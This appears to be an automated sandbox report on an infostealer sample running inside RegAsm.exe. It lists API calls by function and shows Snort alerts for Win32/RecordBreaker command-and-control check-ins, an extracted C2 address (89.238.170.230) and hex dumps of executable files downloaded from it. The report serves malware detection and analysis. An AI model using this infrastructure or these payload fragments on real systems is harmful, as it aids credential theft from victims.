Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00410952 LocalAlloc,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,	3_2_00410952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040CA58 LocalAlloc,StrCpyW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalFree,LocalFree,LocalAlloc,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,	3_2_0040CA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004105DE LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,GetFileSize,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,LocalFree,FindClose,	3_2_004105DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00403BE6 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	3_2_00403BE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040E179 CreateEventA,SetEvent,ResetEvent,CreateMutexA,RegOpenKeyExA,ReleaseMutex,GetLastError,RegOpenKeyExA,CreateWaitableTimerA,RegOpenKeyExA,CancelWaitableTimer,FindFirstFileA,FindClose,CreateSemaphoreA,CreateSemaphoreA,ReleaseSemaphore,ReleaseSemaphore,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,OutputDebugStringA,RegOpenKeyExA,LocalAlloc,OutputDebugStringA,LocalFree,SetEnvironmentVariableA,CreateFileMappingW,FindFirstFileW,	3_2_0040E179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004084FB LocalAlloc,FindFirstFileW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	3_2_004084FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040F788 LocalAlloc,GetLastError,GetLastError,LocalFree,RegOpenKeyExA,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CancelWaitableTimer,CancelWaitableTimer,OutputDebugStringA,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,CreateMutexA,SetEnvironmentVariableA,ReleaseMutex,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,GetLastError,CreateFileMappingW,RegOpenKeyExA,CloseHandle,SetEnvironmentVariableA,LocalAlloc,FindFirstFileA,FindClose,LocalAlloc,LocalFree,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CancelWaitableTimer,CancelWaitableTimer,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,SetEnvironmentVariableA,CreateSemaphoreA,OutputDebugStringA,ReleaseSemaphore,GetLastError,LocalAlloc,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CancelWaitableTimer,CancelWaitableTimer,CreateFileMappingW,GetLastError,CloseHandle,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,CreateSemaphoreA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,RegOpenKeyExA,CreateSemaphoreA,GetLastError,ReleaseSemaphore,RegOpenKeyExA,LocalAlloc,LocalFree,RegOpenKeyExA,GetLastError,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,SetEnvironmentVariableA,StrCpyW,LocalFree,	3_2_0040F788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00408109 OutputDebugStringA,SetEnvironmentVariableA,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindClose,lstrlenW,	3_2_00408109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040FC1E CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,RegOpenKeyExA,CreateFileMappingW,SetEnvironmentVariableA,SetEnvironmentVariableA,CloseHandle,RegOpenKeyExA,LocalAlloc,RegOpenKeyExA,LocalFree,CreateEventA,SetEvent,ResetEvent,CreateMutexA,ReleaseMutex,OutputDebugStringA,CreateWaitableTimerA,SetEnvironmentVariableA,GetLastError,CancelWaitableTimer,GetLastError,CreateToolhelp32Snapshot,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,SetEnvironmentVariableA,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,SetEnvironmentVariableA,CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,GetLastError,ReleaseSemaphore,RegOpenKeyExA,OutputDebugStringA,Process32FirstW,lstrcmpiW,CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,ReleaseSemaphore,LocalAlloc,OutputDebugStringA,LocalFree,RegOpenKeyExA,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,GetLastError,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,GetLastError,CreateMutexA,ReleaseMutex,GetLastError,SetEnvironmentVariableA,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,	3_2_0040FC1E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00403E9F StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	3_2_00403E9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004087AA LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,	3_2_004087AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040392D LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	3_2_0040392D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004041AD StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	3_2_004041AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004017B3 FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW,	3_2_004017B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00407938 LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,	3_2_00407938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040F23A lstrlenA,lstrlenA,lstrlenA,LocalAlloc,CreateEventA,SetEvent,ResetEvent,CreateFileMappingW,GetLastError,CloseHandle,OutputDebugStringA,CreateWaitableTimerA,CreateWaitableTimerA,CancelWaitableTimer,CreateWaitableTimerA,RegOpenKeyExA,CancelWaitableTimer,RegOpenKeyExA,FindFirstFileA,FindClose,CreateSemaphoreA,CreateSemaphoreA,ReleaseSemaphore,GetLastError,LocalAlloc,LocalFree,CreateMutexA,ReleaseMutex,OutputDebugStringA,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateFileMappingW,CloseHandle,GetLastError,GetLastError,CreateMutexA,GetLastError,ReleaseMutex,FindFirstFileA,FindClose,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,CreateSemaphoreA,GetLastError,ReleaseSemaphore,SetEnvironmentVariableA,GlobalFree,	3_2_0040F23A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040E83D CreateWaitableTimerA,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,CancelWaitableTimer,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,OutputDebugStringA,LocalAlloc,RegOpenKeyExA,LocalFree,CreateMutexA,SetEnvironmentVariableA,ReleaseMutex,LocalAlloc,lstrlenW,LocalAlloc,CreateWaitableTimerA,RegOpenKeyExA,CancelWaitableTimer,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateFileMappingW,OutputDebugStringA,CloseHandle,OutputDebugStringA,SetEnvironmentVariableA,FindFirstFileA,FindClose,LocalAlloc,SetEnvironmentVariableA,LocalFree,GetLastError,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,CreateMutexA,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,lstrlenW,StrCpyW,LocalFree,StrCpyW,LocalFree,	3_2_0040E83D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004103E1 OutputDebugStringA,SetEnvironmentVariableA,LocalAlloc,LocalFree,LocalAlloc,GetLogicalDriveStringsW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,

3_2_004103E1

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin M1 192.168.2.7:49699 -> 89.238.170.230:80
Source: Traffic	Snort IDS: 2036955 ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response 89.238.170.230:80 -> 192.168.2.7:49699

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://89.238.170.230:80

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 29 Mar 2024 13:23:54 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:48 GMTETag: "62548404-1f29b8"Expires: Fri, 29 Mar 2024 13:53:54 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 29 Mar 2024 13:24:49 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:42 GMTETag: "625483fe-6db00"Expires: Fri, 29 Mar 2024 13:54:49 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 29 Mar 2024 13:24:56 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 21:52:46 GMTETag: "629299ae-13900"Expires: Fri, 29 Mar 2024 13:54:56 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 29 Mar 2024 13:24:58 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:36 GMTETag: "625483f8-991b8"Expires: Fri, 29 Mar 2024 13:54:58 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 